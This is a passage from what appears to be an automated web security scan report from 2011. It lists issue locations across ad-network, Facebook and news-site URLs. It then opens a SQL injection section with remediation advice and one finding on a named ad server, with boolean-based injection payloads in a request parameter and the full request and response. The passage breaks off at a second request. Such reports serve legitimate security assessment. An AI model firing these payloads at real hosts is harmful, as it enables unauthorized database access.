19.40. http://googleads.g.doubleclick.net/pagead/ads

19.41. http://googleads.g.doubleclick.net/pagead/ads

19.42. http://googleads.g.doubleclick.net/pagead/ads

19.43. http://googleads.g.doubleclick.net/pagead/ads

19.44. http://googleads.g.doubleclick.net/pagead/ads

19.45. http://googleads.g.doubleclick.net/pagead/ads

19.46. http://googleads.g.doubleclick.net/pagead/ads

19.47. http://ib.adnxs.com/ab

19.48. http://idolator.com/ifb/audience-science.html

19.49. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php

19.50. http://kotaku.com/static/ad_iframe.php

19.51. http://kotaku.com/static/ad_iframe.php

19.52. http://kotaku.com/static/items/kotaku.com/trackers.html

19.53. https://login.yahoo.com/config/login_verify2

19.54. http://media.photobucket.com/image/recent/Smirk_Dog/GIFS/MacSigDance.gif

19.55. http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/

19.56. http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/solo/1@x06

19.57. http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Left

19.58. http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Position2

19.59. http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/

19.60. http://sportdfw.com/aboutcontact-us/

19.61. http://sportdfw.com/img/city/dallas/img/content-email-submit.gif

19.62. http://sportdfw.com/z-the-fort-worth-four/

19.63. http://sports.yahoo.com/nba/expertsarchive

19.64. http://sports.yahoo.com/nba/news

19.65. http://sports.yahoo.com/nba/news

19.66. http://sports.yahoo.com/nba/news

19.67. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html

19.68. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

19.69. http://www.facebook.com/plugins/activity.php

19.70. http://www.facebook.com/plugins/comments.php

19.71. http://www.facebook.com/plugins/like.php

19.72. http://www.facebook.com/plugins/likebox.php

19.73. http://www.facebook.com/plugins/recommendations.php

19.74. http://www.facebook.com/widgets/like.php

19.75. http://www.gamershell.com/news_118846.html

19.76. http://www.imdb.com/images/a/ifb/google_afc_labs.html

19.77. http://www.imdb.com/images/a/ifb/pda_comm2.html

19.78. http://www.imdb.com/title/tt0944947/

19.79. http://www.imdb.com/title/tt0944947/_ajax/footer

19.80. http://www.mavgear.com/Dallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html

19.81. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

19.82. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

19.83. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us

19.84. http://www.mavsmoneyball.com/fanposts

19.85. http://www.mavsmoneyball.com/mavericks-tickets

19.86. http://www.mavsmoneyball.com/mavericks-tickets

19.87. http://www.mavsmoneyball.com/mavericks-tickets

19.88. http://www.nba.com/mavericks/index_main.html

19.89. http://www.nba.com/mavericks/playoffs/2011_nba_finals_champions.html

19.90. http://www.nba.com/video/cvp/teamarticleplayer.html

19.91. http://www.stumbleupon.com/badge/embed/5/

19.92. http://www.twackle.com/

19.93. http://www.twackle.com/fansided/General_Twackle_Widget

19.94. http://www.twackle.com/headlines

19.95. http://www.ugo.com/cm/ugo/js/ugo-global.js

19.96. http://www.ugo.com/xd_receiver.htm

19.97. http://z-ecx.images-amazon.com/images/G/01/pda/ifc._V195103274_.js

20. TRACE method is enabled

20.1. http://ads.pubmatic.com/

20.2. http://d.xp1.ru4.com/

20.3. http://dg.specificclick.net/

20.4. http://m.xp1.ru4.com/

20.5. http://secure-us.imrworldwide.com/

20.6. http://track1000.pubmatic.com/

21. Email addresses disclosed

21.1. http://ads.adbrite.com/adserver/vdi/742697

21.2. http://fastcache.gawkerassets.com/assets/base.v10/static/base.v10.widget.s20110610a.js

21.3. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/wpaudio.js

21.4. http://img.timeinc.net/tii/omniture/h/common.js

21.5. http://img.timeinc.net/time/rd/trunk/www/web/feds/j/mobileExperience.js

21.6. https://login.yahoo.com/config/login_verify2

21.7. http://mediacdn.disqus.com/1307735099/build/system/disqus.js

21.8. http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js

21.9. http://sportdfw.com/aboutcontact-us/

21.10. http://sportdfw.com/wp-content/plugins/wp-recaptcha/recaptcha.css

21.11. http://thesouthern.com/content/tncms/live/global/resources/scripts/common.js

21.12. http://thesouthern.com/content/tncms/live/global/resources/scripts/facebox.js

21.13. http://thesouthern.com/content/tncms/live/global/resources/scripts/port-comments.js

21.14. http://thesouthern.com/content/tncms/live/global/resources/styles/skin.css

21.15. http://widgets3.flux.com/Widget/ContentAction/3023/en-US

21.16. http://www.hbo.com/utils/js/jquery/plugins/jquery.cookie.js

21.17. http://www.mavgear.com/skin1/menu.js

21.18. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

21.19. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us

21.20. http://www.mavsmoneyball.com/fanposts

21.21. http://www.mavsmoneyball.com/mavericks-tickets

21.22. http://www.mtv.com/global/music/modules/followUs/js/index.jhtml

21.23. http://www.nba.com/js/controls.js

21.24. http://www.nba.com/js/cookieFunctions.js

21.25. http://www.nba.com/js/dragdrop.js

21.26. http://www.twackle.com/

21.27. http://www.twackle.com/headlines

21.28. http://www.twackle.com/javascripts/all.js

22. Private IP addresses disclosed

22.1. http://api.connect.facebook.com/static/v0.4/client_restserver.php

22.2. http://connect.facebook.net/en_US/all.js

22.3. http://desmond.yfrog.com/Himg737/scaled.php

22.4. http://external.ak.fbcdn.net/safe_image.php

22.5. http://external.ak.fbcdn.net/safe_image.php

22.6. http://external.ak.fbcdn.net/safe_image.php

22.7. http://external.ak.fbcdn.net/safe_image.php

22.8. http://external.ak.fbcdn.net/safe_image.php

22.9. http://external.ak.fbcdn.net/safe_image.php

22.10. http://external.ak.fbcdn.net/safe_image.php

22.11. http://external.ak.fbcdn.net/safe_image.php

22.12. http://external.ak.fbcdn.net/safe_image.php

22.13. http://external.ak.fbcdn.net/safe_image.php

22.14. http://external.ak.fbcdn.net/safe_image.php

22.15. http://graph.facebook.com/1599594030/picture

22.16. http://graph.facebook.com/680122358/picture

22.17. http://graph.facebook.com/695375004/picture

22.18. http://graph.facebook.com/701741542/picture

22.19. http://justjared.buzznet.com/favicon.ico

22.20. http://justjared.buzznet.com/favicon.ico

22.21. http://media.expedia.com/ads/travelhook/travelhook.js

22.22. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif

22.23. http://static.ak.connect.facebook.com/connect.php

22.24. http://static.ak.connect.facebook.com/connect.php/en_US

22.25. http://static.ak.connect.facebook.com/connect.php/en_US

22.26. http://static.ak.connect.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

22.27. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

22.28. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

22.29. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

22.30. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

22.31. http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.debug.js

22.32. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

22.33. http://static.ak.fbcdn.net/connect/xd_proxy.php

22.34. http://static.ak.fbcdn.net/connect/xd_proxy.php

22.35. http://static.ak.fbcdn.net/connect/xd_proxy.php

22.36. http://static.ak.fbcdn.net/images/fbconnect/login-buttons/connect_light_medium_short.gif

22.37. http://static.ak.fbcdn.net/images/fbconnect/login-buttons/connect_light_medium_short.gif

22.38. http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/nXqcdeyQ5vr.js

22.39. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/AkVjWVFFdhX.js

22.40. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/xfp-ll5tNb2.js

22.41. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/XcVjTLuzQ2O.js

22.42. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/NSCTCZ866vV.css

22.43. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/dYwII2uSVbM.css

22.44. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css

22.45. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/-uzFkmw0aKD.js

22.46. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/ZwGc6Ghug0y.css

22.47. http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/4zEIrWluYBR.css

22.48. http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/nIpljRV8xB5.js

22.49. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/hnAKuJ5eYKY.css

22.50. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/OJBsowkZPti.js

22.51. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/t4syXsnV4WE.js

22.52. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif

22.53. http://www.facebook.com/extern/login_status.php

22.54. http://www.facebook.com/extern/login_status.php

22.55. http://www.facebook.com/extern/login_status.php

22.56. http://www.facebook.com/extern/login_status.php

22.57. http://www.facebook.com/extern/login_status.php

22.58. http://www.facebook.com/extern/login_status.php

22.59. http://www.facebook.com/extern/login_status.php

22.60. http://www.facebook.com/extern/login_status.php

22.61. http://www.facebook.com/extern/login_status.php

22.62. http://www.facebook.com/extern/login_status.php

22.63. http://www.facebook.com/extern/login_status.php

22.64. http://www.facebook.com/extern/login_status.php

22.65. http://www.facebook.com/extern/login_status.php

22.66. http://www.facebook.com/extern/login_status.php

22.67. http://www.facebook.com/extern/login_status.php

22.68. http://www.facebook.com/extern/login_status.php

22.69. http://www.facebook.com/extern/login_status.php

22.70. http://www.facebook.com/extern/login_status.php

22.71. http://www.facebook.com/plugins/activity.php

22.72. http://www.facebook.com/plugins/comments.php

22.73. http://www.facebook.com/plugins/like.php

22.74. http://www.facebook.com/plugins/like.php

22.75. http://www.facebook.com/plugins/like.php

22.76. http://www.facebook.com/plugins/like.php

22.77. http://www.facebook.com/plugins/like.php

22.78. http://www.facebook.com/plugins/like.php

22.79. http://www.facebook.com/plugins/like.php

22.80. http://www.facebook.com/plugins/like.php

22.81. http://www.facebook.com/plugins/like.php

22.82. http://www.facebook.com/plugins/like.php

22.83. http://www.facebook.com/plugins/like.php

22.84. http://www.facebook.com/plugins/like.php

22.85. http://www.facebook.com/plugins/like.php

22.86. http://www.facebook.com/plugins/like.php

22.87. http://www.facebook.com/plugins/like.php

22.88. http://www.facebook.com/plugins/like.php

22.89. http://www.facebook.com/plugins/like.php

22.90. http://www.facebook.com/plugins/like.php

22.91. http://www.facebook.com/plugins/like.php

22.92. http://www.facebook.com/plugins/like.php

22.93. http://www.facebook.com/plugins/like.php

22.94. http://www.facebook.com/plugins/like.php

22.95. http://www.facebook.com/plugins/like.php

22.96. http://www.facebook.com/plugins/like.php

22.97. http://www.facebook.com/plugins/like.php

22.98. http://www.facebook.com/plugins/like.php

22.99. http://www.facebook.com/plugins/like.php

22.100. http://www.facebook.com/plugins/like.php

22.101. http://www.facebook.com/plugins/like.php

22.102. http://www.facebook.com/plugins/like.php

22.103. http://www.facebook.com/plugins/like.php

22.104. http://www.facebook.com/plugins/like.php

22.105. http://www.facebook.com/plugins/like.php

22.106. http://www.facebook.com/plugins/like.php

22.107. http://www.facebook.com/plugins/like.php

22.108. http://www.facebook.com/plugins/like.php

22.109. http://www.facebook.com/plugins/like.php

22.110. http://www.facebook.com/plugins/like.php

22.111. http://www.facebook.com/plugins/like.php

22.112. http://www.facebook.com/plugins/like.php

22.113. http://www.facebook.com/plugins/likebox.php

22.114. http://www.facebook.com/plugins/likebox.php

22.115. http://www.facebook.com/plugins/likebox.php

22.116. http://www.facebook.com/plugins/likebox.php

22.117. http://www.facebook.com/plugins/likebox.php

22.118. http://www.facebook.com/plugins/likebox.php

22.119. http://www.facebook.com/plugins/likebox.php

22.120. http://www.facebook.com/plugins/likebox.php

22.121. http://www.facebook.com/plugins/likebox.php

22.122. http://www.facebook.com/plugins/recommendations.php

22.123. http://www.facebook.com/plugins/send.php

22.124. http://www.facebook.com/plugins/send.php

22.125. http://www.facebook.com/widgets/like.php

22.126. http://www35.glam.com/gad/glamadapt_jsrv.act

22.127. http://www35.glam.com/gad/glamadapt_jsrv.act

22.128. http://www35.glam.com/gad/glamadapt_jsrv.act

22.129. http://www35.glam.com/gad/glamadapt_jsrv.act

22.130. http://www35.glam.com/gad/glamadapt_jsrv.act

22.131. http://www35.glam.com/gad/glamadapt_jsrv.act

22.132. http://www35.glam.com/gad/glamadapt_jsrv.act

22.133. http://www35.glam.com/gad/glamadapt_jsrv.act

22.134. http://www35.glam.com/gad/glamadapt_jsrv.act

23. Credit card numbers disclosed

23.1. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js

23.2. http://www35.glam.com/gad/glamadapt_jsrv.act

24. Robots.txt file

24.1. http://altfarm.mediaplex.com/ad/js/17038-128465-20406-11

24.2. http://d.xp1.ru4.com/meta

24.3. http://l.addthiscdn.com/live/t00/250lo.gif

24.4. http://load.exelator.com/load/

24.5. http://m.xp1.ru4.com/meta

24.6. http://matrix.hbo.com/b/ss/hboprod/1/H.20.3/s76848129960708

24.7. http://s.media-imdb.com/twilight/

24.8. http://segment-pixel.invitemedia.com/unpixel

24.9. http://server.cpmstar.com/brilig.aspx

24.10. http://vt.imiclk.com/cgi/vtc.cgi

24.11. http://www.mavgear.com/adaptive.php

25. HTML does not specify charset

25.1. http://ad.doubleclick.net/adi/N1558.NetMining/B5527925

25.2. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

25.3. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

25.4. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7

25.5. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3

25.6. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

25.7. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2

25.8. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8

25.9. http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7

25.10. http://ad.doubleclick.net/adi/amzn.us.audienceextension/

25.11. http://ad.doubleclick.net/adi/x1.dt/dt2

25.12. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt

25.13. http://ad.doubleclick.net/pfadx/fansided_cim/

25.14. http://ad.yieldmanager.com/iframe3

25.15. http://adserver.veruta.com/cookiematch.fcgi

25.16. http://amch.questionmarket.com/adscgen/st.php

25.17. http://bidnw.ru4.com/nf

25.18. http://bn.xp1.ru4.com/nf

25.19. http://bpx.a9.com/amzn/iframe.html

25.20. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.21. http://cdn-bpx.a9.com/amzn/iframe.html

25.22. http://cdn.apture.com/media/html/aptureLoadIframe.html

25.23. http://content1.admonkey.dapper.net/clients/expedia/Infosite_US.html

25.24. http://creativeby1.unicast.com/script/V3.00/deliver2.html

25.25. http://d13.zedo.com/OzoDB/cutils/R53_5_5/jsc/1190/zpu.html

25.26. http://d3.zedo.com/jsc/d3/ff2.html

25.27. http://d3l3lkinz3f56t.cloudfront.net/dclk1-0.9.html

25.28. http://data.nba.com/data/html/gdyn/gdyn_nba.html

25.29. http://ds.addthis.com/red/psi/sites/idolator.com/p.json

25.30. http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest.php

25.31. http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest/1307750400.php

25.32. http://fls.doubleclick.net/activityi

25.33. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php

25.34. http://js.adsonar.com/js/pass.html

25.35. http://kotaku.com/static/items/kotaku.com/trackers.html

25.36. http://mediacdn.disqus.com/1307735099/build/system/def.html

25.37. http://mediacdn.disqus.com/1307735099/build/system/reply.html

25.38. http://ping.chartbeat.net/ping

25.39. http://pixel.invitemedia.com/data_sync

25.40. http://platform0.twitter.com/widgets/follow_button.html

25.41. http://ptimeinc.chartbeat.net/ping

25.42. http://showadsak.pubmatic.com/AdServer/AdServerServlet

25.43. http://static.ny.us.criteo.net/empty.html

25.44. http://stats.townnews.com/thesouthern.com/

25.45. http://subscription-assets.time.com/prod/assets/themes/magazines/SUBS/templates/velocity/site/td-300x100bluepartofie/continue-ofie.html

25.46. http://tags.bluekai.com/site/2312

25.47. http://thesouthern.com/app/port/bulkCommentCount.php

25.48. http://thesouthern.com/app/port/tabMostCommentedJs.php

25.49. http://w55c.net/ct/cms-2-frame.html

25.50. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/14683/NF/RETURN-CODE/JS/

25.51. http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp

25.52. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp

25.53. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp

25.54. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp

25.55. http://www.hbo.com/favicon.ico

25.56. http://www.imdb.com/images/SF8dcd77f70a5de2a050e47b985a4dfa00/a/js/scriptloader.html

25.57. http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html

25.58. http://www.imdb.com/images/a/ifb/google_afc_labs.html

25.59. http://www.imdb.com/images/a/ifb/pda_comm2.html

25.60. http://www.imdb.com/title/tt0944947/_ajax/footer

25.61. http://www.mtv.com/global/music/modules/followUs/js/index.jhtml

25.62. http://www.mtv.com/global/music/modules/rssPartner/js/index.jhtml

25.63. http://www.mtv.com/sitewide/modules/footer/brandFooter/js/index.jhtml

25.64. http://www.mtv.com/sitewide/modules/footer/js/index.jhtml

25.65. http://www.mtv.com/sitewide/modules/header/mtv/js/index.jhtml

25.66. http://www.nba.com/mavericks/

25.67. http://www.nba.com/video/cvp/teamarticleplayer.html

25.68. http://www.oneregion.com/app/calendar/events/js/calWidget.php

25.69. http://www.paperg.com/jsfb/embed.php

25.70. http://www.ugo.com/takeover/takeover.html

25.71. http://www.ugo.com/xd_receiver.htm

26. Content type incorrectly stated

26.1. http://ad.doubleclick.net/pfadx/fansided_cim/

26.2. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455**

26.3. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073**

26.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673**

26.5. http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/200x33_30%20years.jpg

26.6. http://admeld.lucidmedia.com/clicksense/admeld/match

26.7. http://adserv.impactengine.com/www/e9/07/w2/1y/objembed.html/@@1307040897@@

26.8. http://adserver.veruta.com/cookiematch.fcgi

26.9. http://amch.questionmarket.com/adscgen/st.php

26.10. http://api.mixpanel.com/track/

26.11. http://api.twitter.com/1/dallasmavs/lists/mavs-insiders/statuses.json

26.12. http://api.twitter.com/1/fansided/lists/fansided-nba/statuses.json

26.13. http://api.uproxx.com/ulink/template.js

26.14. http://ar.voicefive.com/b/rc.pli

26.15. http://as.jivox.com/player/jivox_ad_tags.php

26.16. http://as.jivox.com/unit/jivox_unit_tags.php

26.17. http://beacon.videoegg.com/btf

26.18. http://beacon.videoegg.com/initjs

26.19. http://beacon.videoegg.com/invpos

26.20. http://bes-clck.com/v

26.21. http://bs.serving-sys.com/BurstingPipe/adServer.bs

26.22. http://cdn.apture.com/media/searchfilter.khtml.v33513556.js

26.23. http://cdn.triggertag.gorillanation.com/js/4600_US.php

26.24. http://cdn2.sbnation.com/profile_images/435869/a7d63d06_small.jpg

26.25. http://cm.npc-lee.overture.com/partner/css/ads.css

26.26. http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest.php

26.27. http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest/1307750400.php

26.28. http://event.adxpose.com/event.flow

26.29. http://expedia-www.baynote.net/baynote/tags3/common

26.30. http://hollywoodcrush.mtv.com/wp-content/themes/charlie_default/community/flux.inc

26.31. http://kotaku.com/

26.32. http://l.apture.com/v3/

26.33. http://l.yimg.com/a/p/sp/editorial_image/d4/d4f4977a4af580e2188d0b9454605942/nbamia.jpg

26.34. http://mediacdn.disqus.com/1307735099/fonts/disqus-webfont.woff

26.35. http://moviesblog.mtv.com/wp-content/themes/charlie_default/community/flux.inc

26.36. http://my.yahoo.com/e/df

26.37. http://my.yahoo.com/e/js

26.38. http://pglb.buzzfed.com/63975/3848554c08824c2e6b4e5963f6d2d7e2

26.39. http://pglb.buzzfed.com/83240/6ff44b0268185d901ef2d93cd3d3a48f

26.40. http://platform.twitter.com/widgets.js

26.41. http://showadsak.pubmatic.com/AdServer/AdServerServlet

26.42. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

26.43. http://thesouthern.com/app/port/bulkCommentCount.php

26.44. http://thesouthern.com/app/port/tabMostCommentedJs.php

26.45. http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/

26.46. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/14683/NF/RETURN-CODE/JS/

26.47. http://www.buzzfeed.com/favicon.ico

26.48. http://www.expedia.com/daily/js/flash.vbs

26.49. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp

26.50. http://www.facebook.com/extern/login_status.php

26.51. http://www.lijit.com/wijit

26.52. http://www.mavgear.com/favicon.ico

26.53. http://www.mtv.com/global/music/modules/followUs/js/index.jhtml

26.54. http://www.mtv.com/global/music/modules/rssPartner/js/index.jhtml

26.55. http://www.mtv.com/shared/promoimages/bands/a/a_day_to_remember/push/mini_banner//239x90.jpg

26.56. http://www.mtv.com/sitewide/css/charlie/themes/blogs/mtvmoviesblog/bg-tile_1200.gif

26.57. http://www.mtv.com/sitewide/modules/footer/brandFooter/js/index.jhtml

26.58. http://www.mtv.com/sitewide/modules/footer/js/index.jhtml

26.59. http://www.mtv.com/sitewide/modules/header/mtv/js/index.jhtml

26.60. http://www.oneregion.com/app/calendar/events/js/calWidget.php

26.61. http://www.paperg.com/jsfb/embed.php

26.62. http://www.reddit.com/static/spreddit4.gif

26.63. http://www.stumbleupon.com/hostedbadge.php

26.64. http://www2.sesamestats.com/paneltracking.aspx

26.65. http://www24a.glam.com/appdir/resources/rendergadget.js

27. Content type is not specified

27.1. http://ad.yieldmanager.com/st

27.2. http://ads.bluelithium.com/st

27.3. http://www.expedia.com/static/default/default/images/close_button.gif

27.4. http://www.expedia.com/static/default/default/images/infosite/hotel_detail_rating_bar.gif

27.5. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_down.gif

27.6. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_up.gif

27.7. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif

27.8. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif

27.9. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

27.10. http://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

27.11. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png

27.12. http://www.meebo.com/cmd/tc



1. SQL injection  next
There are 8 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://as.jivox.com/player/iabplayer.php [siteId parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://as.jivox.com
Path:   /player/iabplayer.php

Issue detail

The siteId parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the siteId parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /player/iabplayer.php?siteId=24bbcd13d37379'%20and%201%3d1--%20&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:07:41 GMT
Expires: Mon, 4 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 2102
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Jivox Ad Preview
...[SNIP]...
k1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%252F2%252F%252Ahttp%253A%252F%252Fwww.quatros.com%26mouseAction%3DmouseOver%26autoPlay%3Dtrue%26maxAds%3D3%26pauseBetweenAds%3D1000%26volume%3D0%26volumeInitAction%3DtoggleMute%26restartOnUnmute%3D1%26jivoxBranded%3Dfalse%26serverURL%3Dhttp%3A%2F%2Fas.jivox.com%26reportingURL%3Dhttp%253A%252F%252Fevs.jivox.com%26adThumbnail%3Dhttp%3A%2F%2Fjivoxuploads.s3.amazonaws.com%2F15976%2F11955-vid-1284509745-4c901031d728a-b.jpg%26adVideoURL%3D' type='text/javascript'%3E%3C/script%3E"));
   </script>
   <noscript>
    <a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com" target="_blank">
    <img src="http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg" height="250" width="300" border="0" />
    </a>
   </noscript>
</body>
</html>

Request 2

